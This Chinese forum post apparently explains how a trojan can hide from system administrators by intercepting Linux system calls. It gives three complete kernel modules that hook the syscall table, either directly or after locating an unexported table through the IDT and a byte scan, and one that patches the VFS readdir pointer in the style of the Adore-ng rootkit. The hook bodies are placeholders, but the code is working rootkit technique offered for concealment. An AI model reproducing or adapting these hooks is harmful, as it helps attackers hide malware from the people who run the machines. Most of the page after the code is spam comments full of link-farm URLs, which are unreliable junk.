如果一个木马要隐藏起来,不被系统管理员发现。截获系统调用似乎是必须的。大部分情况
下,通过修改系统调用表来实现系统调用的劫持。
下面是一个典型的截获系统调用的模块:
模块一:
#include
#include
#include
#include
#include
#include
#include
#include
#include
MODULE_LICENSE("GPL");
extern void* sys_call_table[]; /*sys_call_table is exported, so we can access
it. But in some system this will cause problem */
int (*orig_mkdir)(const char *path); /*the original systemcall*/
int hacked_mkdir(const char *path)
{
return 0; /*everything is ok, but he new systemcall
does nothing*/
}
int init_module(void) /*module setup*/
{
orig_mkdir=sys_call_table[SYS_mkdir];
sys_call_table[SYS_mkdir]=hacked_mkdir;
return 0;
}
void cleanup_module(void) /*module shutdown*/
{
sys_call_table[SYS_mkdir]=orig_mkdir; /*set mkdir syscall to the origal
one*/
}
用这种方法实现系统调用有个前提,就是系统必须导出sys_call_table内核符号,但是在
2.6内核和有些2.4内核的系统(比如redhat as 3)中,sys_call_table不再导出。也就是
说模块中不能再通过简单的extern void *sys_call_table[];来获得系统调用表地址。
所幸的是,即使内核不导出sys_call_table,也可以在内存中找到它的地址,下面是它的实
现方法:
模块二:(2.4和2.6内核测试通过)
#include
#include
#include
#include
#include
MODULE_LICENSE("GPL");
MODULE_AUTHOR("xunil@bmy");
MODULE_DESCRIPTION("Different from others, this module
automatically locate the entry of sys_call_table !");
unsigned long *sys_call_table=NULL;
asmlinkage int (*orig_mkdir)(const char *,int);
struct _idt
{
unsigned short offset_low,segment_sel;
unsigned char reserved,flags;
unsigned short offset_high;
};
unsigned long *getscTable(){
unsigned char idtr[6],*shell,*sort;
struct _idt *idt;
unsigned long system_call,sct;
unsigned short offset_low,offset_high;
char *p;
int i;
/* get the interrupt descriptor table */
__asm__("sidt %0" : "=m" (idtr));
/* get the address of system_call */
idt=(struct _idt*)(*(unsigned long*)&idtr[2]+8*0x80);
offset_low = idt->offset_low;
offset_high = idt->offset_high;
system_call=(offset_high<<16)|offset_low;
shell=(char *)system_call;
sort="\xff\x14\x85";
/* get the address of sys_call_table */
for(i=0;i<(100-2);i++)
if(shell[i]==sort[0]&&shell[i+1]==sort[1]&&shell[i+2]==sort[2])
break;
p=&shell[i];
p+=3;
sct=*(unsigned long*)p;
return (unsigned long*)(sct);
}
asmlinkage int hacked_mkdir(const char * pathname, int mode){
printk("PID %d called sys_mkdir !\n",current->pid);
return orig_mkdir(pathname,mode);
}
static int __init find_init(void){
sys_call_table = getscTable();
orig_mkdir=(int(*)(const char*,int))sys_call_table[__NR_mkdir];
sys_call_table[__NR_mkdir]=(unsigned long)hacked_mkdir;
return 0;
}
static void __exit find_cleanup(void){
sys_call_table[__NR_mkdir]=(unsigned long)orig_mkdir;
}
module_init(find_init);
module_exit(find_cleanup);
getscTable()是在内存中查找sys_call_table地址的函数。
每一个系统调用都是通过int 0x80中断进入核心,中断描述符表把中断服务程序和中断向量
对应起来。对于系统调用来说,操作系统会调用system_call中断服务程序。system_call函
数在系统调用表中根据系统调用号找到并调用相应的系统调用服务例程。idtr寄存器指向中
断描述符表的起始地址,用__asm__ ("sidt %0" : "=m" (idtr));指令得到中断描述符表起
始地址,从这条指令中得到的指针可以获得int 0x80中断服描述符所在位置,然后计算出
system_call函数的地址。反编译一下system_call函数可以看到在system_call函数内,是
用call sys_call_table指令来调用系统调用函数的。因此,只要找到system_call里的call
sys_call_table(,eax,4)指令的机器指令就可以获得系统调用表的入口地址了。
对于截获文件系统相关的系统调用,Adore-ng rootkit提供了一种新的方法。简单的说,就
是通过修改vfs文件系统的函数跳转表来截获系统调用,这种方法不用借助于系统调用表。
下面是它的实现方法:
模块三:(2.4和2.6内核测试通过)
#include
#include
#include
#include
#include
#include
MODULE_AUTHOR("xunil@BMY");
MODULE_DESCRIPTION("By utilizing the VFS filesystem, this module can capture
system calls.");
MODULE_LICENSE("GPL");
char *root_fs="/";
typedef int (*readdir_t)(struct file *,void *,filldir_t);
readdir_t orig_root_readdir=NULL;
int myreaddir(struct file *fp,void *buf,filldir_t filldir)
{
int r;
printk("<1>You got me partner!\n");
r=orig_root_readdir(fp,buf,filldir);
return r;
}
int patch_vfs(const char *p,readdir_t *orig_readdir,readdir_t new_readdir)
{
struct file *filep;
filep=filp_open(p,O_RDONLY,0);
if(IS_ERR(filep))
return -1;
if(orig_readdir)
*orig_readdir=filep->f_op->readdir;
filep->f_op->readdir=new_readdir;
filp_close(filep,0);
return 0;
}
int unpatch_vfs(const char *p,readdir_t orig_readdir)
{
struct file *filep;
filep=filp_open(p,O_RDONLY,0);
if(IS_ERR(filep))
return -1;
filep->f_op->readdir=orig_readdir;
filp_close(filep,0);
return 0;
}
static int patch_init(void)
{
patch_vfs(root_fs,&orig_root_readdir,myreaddir);
printk("<1>VFS is patched!\n");
return 0;
}
static void patch_cleanup(void)
{
unpatch_vfs(root_fs,orig_root_readdir);
printk("<1>VFS is unpatched!\n");
}
module_init(patch_init);
module_exit(patch_cleanup);
201.254.124.* 于 2007-09-07 05:19:50发表:
391366e6d415213ede33a29faa28959e http://biglietti-finale-di-champions-league.oxibnl.org/ http://anonimo-da-telefono-fisso.oxibnl.org/ http://media-retribuzione.yojewt.org/ http://riempitrici-alimentare.yojewt.org/ http://hotel-capodanno-toscana.oxibnl.org/ http://visibilita-sito-internet-motore-ricerca.vozlau.org/ http://liposuzioneaddominale.ukcvbo.org/annuncio-personale-campobasso/ http://mandolino-capitano-corelli-louis-de-bernieres.hhidlx.org/ http://codice-deontologico-ingegnere.ufftiy.org/ http://gazebo-musica.hhidlx.org/ ef5da0821261872f3a177fbd4ce2e9fc
24.125.23.* 于 2007-09-06 12:01:11发表:
cf893c7a6f989e1760656cb1605ec07a http://www.international.ucf.edu/myphp/community/viewtopic.php?t=124 http://iris.lib.virginia.edu/phpBB2/viewtopic.php?t=7689 http://payson.tulane.edu/techeval/forums/viewtopic.php?t=74 http://www.cide.au.edu/audasaforum/viewtopic.php?t=458 http://www.rstm.edu/phpBB/viewtopic.php?t=1450 http://www.rstm.edu/phpBB/viewtopic.php?t=1450 http://iris.lib.virginia.edu/phpBB2/viewtopic.php?t=7689 http://www.rstm.edu/phpBB/viewtopic.php?t=1450 http://www.cide.au.edu/audasaforum/viewtopic.php?t=458 http://payson.tulane.edu/techeval/forums/viewtopic.php?t=74 d950163e2bc04fe30175aa17834ab13d
190.142.48.* 于 2007-09-05 22:54:49发表:
99c5d7242cbf9fd36e90921db1c7c202 https://www.cslu.ogi.edu/forum/viewtopic.php?t=2656 http://forum.jalc.edu/phpBB2/viewtopic.php?t=2267 https://www.cslu.ogi.edu/forum/viewtopic.php?t=2656 http://forum.jalc.edu/phpBB2/viewtopic.php?t=2267 http://myweb.msoe.edu/~chaversa/phpBB2/viewtopic.php?t=2012 https://www.cslu.ogi.edu/forum/viewtopic.php?t=2657 http://www.mat.ucsb.edu/CUI/viewtopic.php?t=1142 http://www.grahi.upc.edu/ERAD2006/phpBB2/viewtopic.php?t=6839 http://www.mat.ucsb.edu/CUI/viewtopic.php?t=1142 http://forum.jalc.edu/phpBB2/viewtopic.php?t=2267 db62d9d137e7999ef0c8bbd27991ea41
24.201.73.* 于 2007-09-05 08:53:00发表:
f04df0391c9af81ce4ec3a4dc566c694 http://canaletta-portacavi.dfmviz.info/ http://piani-commissioning.dfmviz.info/ http://alimentazione-giornaliera-body.dfmviz.info/ http://syaoran-sakura-immagine-manga.dfmviz.info/ http://motorola-l7-programma.dfmviz.info/ http://settimana-della-cultura-foggia.dfmviz.info/ http://site-www-benelli-it-benelli-arma.dfmviz.info/ http://video-piu-pazzo-mondo.dfmviz.info/ http://linea-metropolitana-milanese.dfmviz.info/ http://traduzione-opere.dfmviz.info/ 21817dd0dbd87cb119a7471ab31fd121
190.31.202.* 于 2007-08-16 02:08:17发表:
6d6a251e6579ebc72ca544036d74200a http://spaghetto-connection.zpvztz.com/ http://codice-penale-cubano-testo-integrale.ddxsak.com/ http://terme-comunali-ischia.flroxk.com/ http://dance-hit-mania-titolo.zpvztz.com/ http://mercatino-chambery.akrmtn.com/ http://provveditorato-di-palermo.flroxk.com/ http://blauer-esercito.akrmtn.com/ http://tesserino-riconoscimento.flroxk.com/ http://film-giorno-dell-abbandono-regista.zpvztz.com/ http://freccia-statica.akrmtn.com/ f79720dbd018955dfd9068d527cd2031
201.58.147.* 于 2007-07-24 22:11:32发表:
9d95af10397c39696d1c00c33ed88afb http://frase-sms-gratis-manchi-amore.ppdpwx.biz/ http://alimentatore-220-v.kajgdw.biz/ http://agriturismo-clusone.zibtye.biz/ http://ottone-di-bismarck.iuatju.biz/ http://pianta-palazzo-minosse.zibtye.biz/ http://scarica-inno-nazionale.zibtye.biz/ http://immagine-simpson-natale.tzlnou.biz/ http://prodotto-diabete.iuatju.biz/ http://viacondotti-franchising-it.ppdpwx.biz/ http://rubinetto-fontana-acqua-calda-fredda.ppdpwx.biz/ 69fae163d26a9b1682339a4eb6fc4ad9
200.104.40.* 于 2007-07-23 12:37:31发表:
964d88652f9c6a737f89fb7f3a1563c0 http://agenzia-pr-roma.vywyuh.org/ http://lauro-ponte.vywyuh.org/ http://indirizzo-url-sito-about-blank.vywyuh.org/ http://lettera-papa-figlia-morta-incidente-stradale.cqhnnx.org/ http://foto-varicocele.pvaeyo.org/ http://america-leucemia-linfatica-cronica.hdpwsk.org/ http://inserire-java-applet-html.cqhnnx.org/ http://spaccio-biancheria-intima.mnkcbe.org/ http://corso-atpl-verona.mnkcbe.org/ http://scuola-privata-ed-universita-pubblicita.cqhnnx.org/ eb89aa2351bfb8dd061b0dc25061dcdb
201.58.120.* 于 2007-07-20 20:25:06发表:
765870a887edeadb39c2bd4d59df2be1 http://coloritogiallo.qemqrg.org/weekend-rilassante-ed-economico/ http://dottorhousesecondastagione.nfnzro.org/verbale-acquisto-azienda/ http://esempiorelazionetirocinio.ghoouy.org/hotel-camaldoli/ schema eletrico industriale http://giocogiocareweb.nfnzro.org/parrocchia-pavia/ dvx 107 irradio royal hamman milano http://marcheascolipiceno.ghoouy.org/lavorare-supermercato-torino/ http://faccinasmileit.ghoouy.org/fac-simile-lavoro/ http://bigliettoteatroscala.qemqrg.org/corso-vigevano/ b8fb7d84153cc5c69600cbe1497734b2
84.123.79.* 于 2007-07-19 11:14:42发表:
bfbd90f82c78ab569f57a9ec83910168 http://istruttore.vbglda.com/ http://tragitto-da-milano-a.fzhoas.in/ http://enciclopedia-medica-cd.miwcjz.com/ http://incentivi-demolizione-auto.aoknmm.in/ http://porta-vetro-milano.uylqdg.com/ http://sweet-years-sfondo.miwcjz.com/ http://utile-cc-univaq-it.kvpzig.com/ http://decreto-legislativo-n-157-1995.uylqdg.com/ http://schema-recupero-funzionale-protesi-anca.bkqryo.com/ http://cartoni-sexy.aoknmm.in/ b8a12f78e2ab8d9c8e5e94f78e975725
200.84.35.* 于 2007-07-17 23:09:37发表:
71a64305e1ba011705eee1f5453a6684 http://cortediappellodipalermo.copdkj.org/fondi-investimento-unicredit/ concessionario porsche torino http://dvdcovercartoneanimato.nxaqjj.org/associazone-cittadinanza-attiva/ http://progettazioneautocad3d.jpwypc.org/alberto-bevilacqua-scrittore/ negozio sport decathlon san francesco d assisi nato giorno servizio valutazione http://alexandritegioielleria.ppnxyq.org/venezia-lampedusa/ http://gruppoelettrogenioliovegetale.wfdklb.org/edoardo-i/ http://cordadelcerchio.jpwypc.org/statistica-posizinamento-sito/ 8ea4fcdde1a965ef95e68187f350c6f6
81.203.208.* 于 2007-07-17 16:40:12发表:
http://ab0eaa58704866c8af6db266c426d241-t.xkktxb.org ab0eaa58704866c8af6db266c426d241 http://ab0eaa58704866c8af6db266c426d241-b1.xkktxb.org ab0eaa58704866c8af6db266c426d241 http://ab0eaa58704866c8af6db266c426d241-b3.xkktxb.org 8d1f2bfe3cbc5359328d95464cab8b7c
58.237.53.* 于 2007-07-16 14:15:19发表:
4fde3e7e97f2511682a4b399ffa94cd1 http://quotazione-vinile-collezione-catalogo.xxmndb.biz/ http://allevamenti-cavalier-king-charles-spaniel.mxkrxs.com/ http://costiera-amalfi.xxmndb.biz/ http://numero-errore-0x800ccc40.ywowql.com/ http://etlim-travel-it.xxmndb.biz/ http://costa-dei-gabbiano.ynpojb.biz/ http://casa-studente-giorgio-grasso.ywowql.com/ http://immagini-di-ballerine.gwedas.com/ http://mambor-palazzo-esposizioni.nioqlj.com/ http://pelo-contro-pelo.mxkrxs.com/ 8cff813cd5cdf93d908a9e43c4704dad
201.211.208.* 于 2007-07-15 06:22:31发表:
fbcab2357f2a6a9a3fbc4a022d1e8a45 http://costruttoremacchinastampaflessografiche.gapphu.org/margherita-hack-sclerosi-laterale/ mummia faraone http://oraritrenisalerno.vozulo.org/pascoli-mare/ http://operaaeroportuali.mqyawz.org/errore-totale/ http://sanremotesticanzoni.eqacfr.org/romanzo-di-alessandro/ conan ragazzo futuro gif animata negozio cina http://bergamoblocco.seklde.org/locatore-locatario/ volante pedale frizione tuta moto donna a875aa102e91579b074fe29fa7a13e81
83.35.126.* 于 2007-07-13 23:12:08发表:
a73cdbddcd18316d7a2713cc76308b61 http://nove-firenze.lldpzx.org/ http://piemontese-maria.njylwy.org/ http://codice-gioco-trucco.lldpzx.org/ http://truffe-892.mhjqva.org/ http://bologna-volley.njylwy.org/ http://biglietti-teatro-smeraldo.tttfhp.org/ http://istanza-correzione-errore-materiale.lvqits.org/ http://www-ippica-biz-it.lvqits.org/ http://preghiera-incontri.hihuft.org/ http://impronta-lupo.lvqits.org/ 8c2a5fabd273020cebfaea52010ee4bb
83.165.86.* 于 2007-07-12 16:28:00发表:
2127ecddf07e6067db2c34ac9bc923fa http://agriturismo-nel-sannio.orjndo.org/ http://asl-via-cartagine.gbymyg.org/ http://sintomo-cancro-al-pancreas.egcngx.org/ http://unopiu-casa-giardino.xxfvsr.org/ http://carabinieri-perugia.orjndo.org/ http://massoneria-storia.uwlbfm.org/ http://worknet-agenzia-interinale.rtistm.org/ http://corriere-incontro.qeeuwf.org/ http://diaframma-fotografico-schema-obiettivo.udzjxi.org/ http://modello-ricorso-riassunzione.qpjnvy.org/ d8d97f68bc274489b372d34e17b3a169
83.46.164.* 于 2007-07-11 09:29:23发表:
8a7821f52e592d1645389aded622a187 http://1.skachaj.org/pagina36.html http://12.ska4aj.net/pagina46.html http://11.skachaj.org/pagina21.html http://22.skachaj.org/pagina47.html pagina94.html http://8.skachaj.org/pagina13.html http://5.ska4aj.com/pagina37.html http://19.skachaj.org/pagina77.html http://12.ska4aj.org/pagina54.html http://9.ska4aj.net/pagina99.html 53f688e2d0ae01a48f96ad8f8181d4f6
201.210.188.* 于 2007-07-10 00:36:00发表:
6e38f2e870959d26b50364d0d8924dac http://pascoli-mare.wywplu.org/ http://farmaco-mercurio-cromo.gtimmg.org/ http://mausoleo-san-francesco.wywplu.org/ http://seni-giganti.wywplu.org/ http://silver-air-max-97-rosa.bsvetd.org/ http://fumetti-animali.wywplu.org/ http://artrosi-anca-cura.uvrseh.org/ http://ristorante-economici.bsvetd.org/ http://offerta-volo-hotel-8-dicembre.uvrseh.org/ http://emule-problema-ricerca.dkzfpf.org/ 9b45a0bdde2cb75e21785d72ae4741f7
84.5.192.* 于 2007-07-08 15:05:15发表:
8a2e355c7afc3e490cb6bb635beeac66 http://giocavideopokergratis.awcnfe.org/digitali-macchine/ http://hotel-viaggi-d-affari-rimini.zgqwur.org/ http://temi-di-natale-per-pc.rjrigb.org/ http://premiopuntocoopperugia.sphfph.org/tabu-religione/ http://istitutoanzianononautosufficientipiemonte.ikwuex.org/cerchio-lega-subaru/ http://trenoromagenova.sphfph.org/offresi-lavoro-all-estero/ http://miglior-programma-video-editing.wdhffe.org/ http://luigisabatellinaturamorta.xheadf.org/club-pavoniana-casa-vacanza/ http://canzonenatalelinguafranceseit.ybhujc.org/gardeland-parco/ http://alessia-merz-sexy.rjrigb.org/ cda9cd96507def8918671c23330ec82a
91.117.145.* 于 2007-07-08 15:05:10发表:
8a2e355c7afc3e490cb6bb635beeac66 http://giocavideopokergratis.awcnfe.org/digitali-macchine/ http://hotel-viaggi-d-affari-rimini.zgqwur.org/ http://temi-di-natale-per-pc.rjrigb.org/ http://premiopuntocoopperugia.sphfph.org/tabu-religione/ http://istitutoanzianononautosufficientipiemonte.ikwuex.org/cerchio-lega-subaru/ http://trenoromagenova.sphfph.org/offresi-lavoro-all-estero/ http://miglior-programma-video-editing.wdhffe.org/ http://luigisabatellinaturamorta.xheadf.org/club-pavoniana-casa-vacanza/ http://canzonenatalelinguafranceseit.ybhujc.org/gardeland-parco/ http://alessia-merz-sexy.rjrigb.org/ cda9cd96507def8918671c23330ec82a
190.72.162.* 于 2007-07-07 09:06:49发表:
d5699ec00d9fcc19eff2e98100a16ca4 http://lista-civiche-siena.ylbtbt.org/ http://racconto-vagli-sotto.bubajm.org/ http://video-sesso-gay-gruppo-gratis.ylbtbt.org/ http://sito-ufficiale-del-cis-di-nola.bubajm.org/ http://selenecalloni.skzbln.org/farina-ceci/ programma simile emule http://cannone-antiaereo.xxbtpu.org/ http://problema-paese-arabo-foto.xxbtpu.org/ http://ferrovie-dello-stato-italia.xxbtpu.org/ http://concessionario-peugeot.mcgzbb.org/ 268af5f4294519a6b3a74dbb7c6fdf14
201.211.208.* 于 2007-07-02 10:30:05发表:
52e61aea8cb6910d355c391edb6e4e03 http://forum-eliminazione-italia-ai-mondiale-2002.qttkja.org.in/ http://perito-aziendale-corrispondente-in-lingue-estere.ooqqld.org.in/ http://consiglio-dei-ministri-29-03-2006.innltr.org.in/ http://corso-agente-immobiliare-organizzato-varese.kfxrfs.org.in/ http://prenotazione-online-campeggio-al-jesolo.qttkja.org.in/ http://de-andre-sogno-maria-significato.mksqkw.org.in/ http://ferrovia-nord-milano-ufficio-patrimonio.kfxrfs.org.in/ http://programma-gratis-per-creare-dvd.qttkja.org.in/ http://gruppo-cinofilo-kennel-club-palermo.oaxzml.org.in/ http://forme-uniche-continuita-spazio-antigrazioso.innltr.org.in/ 8a848390101f52442387e8806988b168
201.222.173.* 于 2007-07-01 06:18:27发表:
c61efdfb3b6d72d03e053ff3d2c16984 http://www.produzioneprontomodatagliaforte.pkjtsb.org/ http://www.datoeurobund15minuto.qrxvou.org/ http://provestradaaudia32002.pkjtsb.org/ http://www.donnaletteraturaannamariaorteseimmagine.pkjtsb.org/ http://www.stampanteepsonstylusphoto1290s.opojum.org/ http://www.aiutocuocooffertalavoroalbergo.pkjtsb.org/ http://temacartoneanimatonokia6680.hrjksn.org/ http://www.prezzomaterialeinertifondostradale.jfjurx.org/ http://www.annoautononpossonopiucircolare.ocuokj.org/ http://raccontoamiciziascuoladellinfanzia.ocuokj.org/ 246f5573f09449eb624440463d221fca
88.24.203.* 于 2007-06-30 03:14:25发表:
415de48e4132d1b974cb977c56d284aa http://giocareonlinegiococartepokemon.uqjhgg.org/l-amore-e-un-trucco/ uso e costume della grecia antica http://via-brescia-n-3-policoro.ukizsc.org/ http://primo-passo-maschile-cha-cha-cha.arooqy.org/ http://cittadeuropatemperaturapiualte.ejiufa.org/azienda-prodotto-tuning-alfa-147/ http://lucacarbonefrancodevita.uqjhgg.org/443-del-21-12-2001/ http://popolino-angelo-site-live-messenger.utpiii.org/ http://posto-al-sole-raitre-it.xflxat.org/ http://associazione-proprietario-torino-via-nota.chohld.org/ http://programma-giochi-pac-man-free-download.msjbrf.org/ 242a24eaaf2d8b6d338dfc62711422de
201.248.196.* 于 2007-06-29 02:39:16发表:
517e91329b4ff20ca1cee8ca375ee275 http://antenna-gps-integrata-sirf-iii.yigqdu.org/ http://cane-fox-terrier-pelo-duro.qkidvr.org/ http://hotel-villa-degli-angeli-castel-gandolfo.yigqdu.org/ http://cinema-fantascienza-anno-50-60.qkidvr.org/ http://fiatx19forsala.fxbzoa.org/macchina-per-scrivere-olivetti-m-20/ ciao tommy fede ragazza numero scrivimi http://sesso-droga-rock-and-roll.jmcomw.org/ http://fiatx19forsala.fxbzoa.org/testo-originale-ave-maria-schubert/ invecchiamento dei fogli di carta http://commentosullapenadimorte.fxbzoa.org/vino-candia-dei-colli-apuani/ 24974b376644b5034250f73cecc2d1d6
201.248.106.* 于 2007-06-27 23:02:01发表:
b201fd4e3bf7368a298483f1f3441bce http://luogo-d-incontro-gay-sicilia.plzgum.org/ http://turismo-nella-provincia-di-verona.aifeuw.org/ http://manuale-uso-rilevazione-presenza-zucchetti.gdcsng.org/ http://scienza-dei-bene-culturale-siracusa.aifeuw.org/ http://giovane-coppia-carina-valuta-singolo.bewzmp.org/ http://caratteristica-acciaio-inox-aisi-304.plzgum.org/ http://incarico-posizione-organizzativa-pubblico-dipendente.vfkyqi.org/ http://comune-settimo-san-pietro-ca-it.avypou.org/ http://alla-ricerca-di-nemo-foto.bwuibo.org/ http://informazione-2-stagione-fiction-capri.vfkyqi.org/ dff758ad4d024eb641677108bbbbea97
201.209.72.* 于 2007-06-26 21:03:52发表:
037464e0c83d921e8d5ce15e71c507cb copertina need for speed carbon ps2 http://suoneriatelitg80viasms.mjdrvf.org/cerco-lavoro-pulizia-gioia-tauro-rc/ http://accessorio-fiat-stilo-3-porta.taryvn.org/ http://programma-per-schema-punto-a-croce.filgvg.org/ http://vip-fanno-sesso-video-scaricare.ynkpgu.org/ http://librotatticagioco442.swmvze.org/italian-paradiso-hard-porno-gratis/ http://programma-realizzare-biglietto-d-augurio.ynkpgu.org/ http://nuovo-servizio-s-s-treviso.pidgzp.org/ http://variabilidisessioneaspnet.mutsoq.org/cass-falsa-testimonianza-errore-fatto/ http://traduzione-dei-viaggio-gulliver-swift.rjablq.org/ ac74524788537f28ae4c90c357df5e97
70.80.234.* 于 2007-06-25 20:11:26发表:
da86d7ad28bc60995111c9aad72680d4 http://autistapatccercalavoro.ggrflx.org/libretto-uso-manutenzione-fiat-126/ film roma cinema programmazione recensione ariosto il castello di atlante http://definancejosephfilosofiagregoriana.yoogjn.org/lavoro-da-casa-di-imbustamento/ http://programmazioneitalianotriennioscuolasuperiori.yoogjn.org/inquadramento-fiscale-consulente-finanziario-indipendente/ http://legge-regionale-campania-n-13-1985.xfnqjv.org/ http://istituti-professionali-per-il-turismo.abpato.org/ http://maglietta-t-shirts-polo-benetton-riga.abpato.org/ posizione corretta davanti al computer stampante hp psc 750 driver 245153f8fc5ca6b7c7f1325ac3918a81
81.242.197.* 于 2007-06-24 18:39:36发表:
72c0252b7df093068975fc1c51618d31 http://don-chisciotte-amore-bellezza-nn-ricambiato.cjgbgx.org/ http://jobancallmeno25anno.fmyuaf.org/smackdown-vs-raw-2006-trucchi-ps2/ http://guida-dei-centro-benessere-lazio.nbjnpk.org/ http://five-fingers-gioco-mortale-film.blzjgn.org/ immagine donna abbigliamento sexi fanno pompino http://meda-flou-outlet-meda-flou-spaccio.iolfyk.org/ http://ticket-com-scontrino-due-facce.ztbpeb.org/ http://olio-ricino-bellezza-dei-capello.nbjnpk.org/ http://cercocamerainaffittoa.shopio.org/sciopero-venerdi-1-dicembre-2006/ tre it negozio tre roma 452262cf741011e1ab8f1c4bc30a15a9
200.35.232.* 于 2007-06-23 18:21:30发表:
06bcf694946becd66591c8a90860f49b http://itestideipinkfloyd.knqtun.org/centro-estetico-ricostruzione-unghia-firenze/ http://linguaggio-psico-pedagogico-cos-metacognizione.mjhbun.org/ http://azienda-praticano-agricoltura-precisione-mondo.mjhbun.org/ http://dove-posso-scaricare-emule-gratis.bxertr.org/ http://gabetti-vendita-appartamento-fleming-roma.xprlxl.org/ http://non-vedere-cronologia-dei-sito-visitati.kesdip.org/ offerta volo nazionale febbraio 2004 http://dannocausatidiabeteapparatogenitale.ihbepf.org/chiesa-san-luca-evangelista-prato/ http://latte-polvere-alfare-400-gr.vjsvzo.org/ http://annuncionumerotelefonicodonnaescortsalerno.knqtun.org/anello-donna-oro-bianco-solitario/ 9552dfe41baaa9f17aeb9f3e17cab334
190.16.42.* 于 2007-06-22 15:24:54发表:
136632e18b13cb595213e91a403e682b http://partito-della-rifondazione-comunista-di.zivzdt.org/ http://impossibileaccedereaquestaversione.dlzazi.org/ente-pubblico-ricerca-finanziamento-europeo/ http://immissioni-ruolo-scuola-primaria-sicilia.ojfmto.org/ http://cattedralesannicolabariallesterno.fvgoov.org/liceo-scientifico-donatelli-a-milano/ http://camper-7-posto-omologato-usato-privato.yevzni.org/ http://download-lettura-file-smc-free.myniqy.org/ http://ricevitoregpsbluetoothnokia6630.qurqnr.org/gelatina-frutta-and-vendita-milano/ http://scuola-media-statale-barrili-genova.jvvvdm.org/ http://candidatestripfromcolpogrosso.dlzazi.org/conte-carmelo-nomina-senatore-2006/ http://contabilita-delle-agenzia-di-assicurazione.ojfmto.org/ 8d0a7cd2b17a8f039de7dab06d2ae220
201.233.28.* 于 2007-06-21 10:19:24发表:
8db4f41ac772f4019530938a7972bbfa http://primo-festivalbar-trasmesso-in-tv.kzsfzp.org/ http://colonna-sonora-sporca-ultima-meta.kzsfzp.org/ http://keith-carradine-m-easy-traduzione.wdrksm.org/ http://programma-trasferire-dato-motorola-c650.wdrksm.org/ http://convenzione-manutenzione-infrastruttura-fax-simile.cmuvxp.org/ http://sinonimo-contrario-on-line-gratis.cmuvxp.org/ http://5.flpvgy.org/herojourney/primalscream.htm http://negozi-di-cellulare-a-torino.tiabis.org/ http://negozio-gioco-usato-playstation-milano.wdrksm.org/ http://moto-club-yamaha-italia-lecco.kzsfzp.org/ 3281355dcdf7961a81348339c85b8f61
201.234.161.* 于 2007-06-20 08:22:28发表:
8e9c4d7de0d4f5f1e0550a890000167a http://inter-auto-2006-libero-it.qafifx.org/index.htm http://istituto-per-la-storia-della-resistenza.sjfxge.org/index.htm index.htm http://richiesta-mutuo-acquisto-prima-casa.nlzixy.org/index.htm index.htm http://ascoltare-conversazioni-attraverso-muro-distanza.zeiuog.org/index.htm http://campeggio-bungalow-camping-baciccia-ceriale.hzsssu.org/index.htm http://traduci-da-inglese-a-italiano.kculvb.org/index.htm http://basilea-kinder-und-jugendbuech-laade.qgzsds.org/index.htm http://isola-d-elba-case-in-affitto.qgzsds.org/index.htm a95af8f224b8c9334b8122ef4b45f39a
190.46.45.* 于 2007-06-19 07:06:52发表:
d6a9f1e85f9b8ede7ad9ff34b6ab766a index.htm http://estratto-bando-gara-licitazione-privata.tadctp.org/index.htm http://compilare-lettera-permesso-uscita-lavoro.vooxwa.org/index.htm http://testo-canzone-diras-que-estoy-loco.vooxwa.org/index.htm index.htm index.htm http://tiziano-ferro-salutandoti-affogo-mp3.aunbvm.org/index.htm http://foto-nude-di-alessia-mancini.tadctp.org/index.htm http://punto-croce-scudetto-calcio-catania.mboptw.org/index.htm index.htm b8055c662679464e43a32265312932f9
62.57.155.* 于 2007-06-18 06:28:26发表:
31dd02f23e0cbe5b4bf00d359d74aa2c index.htm http://hotel-crozzon-madonna-di-campiglio.glzaqv.org/index.htm index.htm http://comune-san-biagio-callalta-documento-minore.ogttfu.org/index.htm http://metodo-and-preparazione-and-cagliata.mmaiuw.org/index.htm http://hotel-albergo-sant-miquel-de-balansat.ovnfxu.org/index.htm http://body-assemblato-hss-stratocaster-style.zpympv.org/index.htm index.htm index.htm index.htm b3e1aeebf15010c0e48986d09609c4eb
85.155.15.* 于 2007-06-17 05:01:06发表:
0981c07adf77c47c3d86598cd2e79503 http://biglietto-augurio-fatti-a-mano.sdgwbd.org/index.htm index.htm http://anello-in-oro-bianco-e-diamanti.yssvot.org/index.htm http://high-school-musical-colonna-sonora.ixzutk.org/index.htm index.htm index.htm index.htm http://fiat-500-d-epoca-ebay.ibngkc.org/index.htm http://dawkins-scrittore-racconto-dell-antenato.sdgwbd.org/index.htm http://trucco-the-sims-2-nds.ibngkc.org/index.htm 6a4e71b09dc8ba3b61a05d0dd09e915b
190.50.167.* 于 2007-06-16 03:43:39发表:
4f476c6067ad7a051a36732607937475 http://canna-al-vento-scheda-libro.qtoruw.org/ http://candela-san-marino-all-ingrosso.dgrbxq.org/ http://gallina-vecchia-fa-buon-brodo.asytgp.org/ http://hotel-di-charme-in-piemonte.asxhjv.org/ http://web-design-trentino-alto-adige.asxhjv.org/ http://contratto-formazione-lavoro-pubblico-impiego.dgrbxq.org/ http://case-in-vendita-francavilla-fontana.dkoomz.org/ http://catasto-non-risulta-classamento-rendita.kluoca.org/ http://hotel-quattro-stella-milano-marittima.dkoomz.org/ http://montaggio-infisso-arredamento-conto-terzi.asytgp.org/ 017184126313b130655c75e326e14932
201.249.117.* 于 2007-06-15 02:09:31发表:
da3372eef10680595feef130531edc5b http://obkfqj.org http://obkfqj.org http://kgsisp.org http://www.bectcd.org http://zzobwb.org http://www.bwmuus.org http://www.nkltre.org http://www.fkrbpd.org http://uzgvit.org http://www.kcxesd.org a4d20a8afbc395002366bd667860c4d3
85.155.69.* 于 2007-06-14 00:51:53发表:
1446b25bfe0942e30261cc3c102ee0b9 http://wrgzjb.org http://widbjf.org http://icqepi.org http://ndvgwp.org http://vtqzvy.org http://www.xgjrbe.org http://xgjrbe.org http://www.dlfnjf.org http://www.nbtxan.org http://nbtxan.org 0f5fa03e3dca64d5b4cd330c6f860531
190.72.30.* 于 2007-06-13 01:46:24发表:
